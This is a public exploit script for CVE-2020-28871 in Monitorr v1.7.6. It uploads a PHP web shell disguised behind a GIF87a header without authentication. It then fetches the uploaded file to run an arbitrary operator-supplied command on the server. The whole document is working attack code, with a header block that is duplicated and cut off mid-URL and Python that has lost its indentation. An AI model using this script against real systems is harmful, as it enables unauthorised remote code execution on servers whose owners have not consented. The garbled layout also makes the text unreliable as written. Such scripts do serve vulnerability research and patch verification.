# Exploit Title: Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution
# Exploit Author: Achuth V P (retrymp3)
# Date: February 09, 2023
# Vendor Homepage: https://gith # Exploit Title: Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution
# Exploit Author: Achuth V P (retrymp3)
# Date: February 09, 2023
# Vendor Homepage: https://github.com/Monitorr/
# Software Link: https://github.com/Monitorr/Monitorr
# Tested on: Ubuntu
# Version: v1.7.6
# Exploit Description: Monitorr v1.7.6 suffers from unauthenticated file upload to remote code execution vulnerability
# CVE: CVE-2020-28871

import requests
import random
import string
#from requests.auth import HTTPBasicAuth
from colorama import (Fore as F, Back as B, Style as S)
BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT

def payL():
fileName=''.join(random.choice(string.ascii_lowercase) for i in range(16))+'.php'
tf1=requests.post(url+'/assets/php/upload.php',
files=(
('fileToUpload', (fileName, 'GIF87a <?php $var=shell_exec('+'"'+cmd+'"'+'); echo "$var" ?>')),))
tf2=requests.get(url+'/assets/data/usrimg/'+fileName)

print(tf2.text)

def sig():
SIG = SB+FY+" "+FR+".-----..___.._____. "+FY+" "
SIG += FY+" | .. >||__-__-_| "
SIG += FY+" "+FR+"| |.' ,||_______ "+FY+" "
SIG += FY+" | _ < ||__-__-_|"+FR+"* * *"+FY+" "
SIG += FY+" | | ||__-__-_ "
SIG += FY+" "+FR+"|___ \_ ||_______| "+FY+" "
SIG += FY+" "+" _____"+FR+"github.com/retrymp3"+FY+"_____ "+ST
return SIG

def argsetup():
about = SB+FT+'Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution '+ST
return about

if __name__ == "__main__":
header = SB+FT+" "+' '+FR+'retrymp3 '+ST
print(header)
print(sig())
print(argsetup())
#proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
url=input("Enter the base url: ")
cmd=input("Command: ")
payL()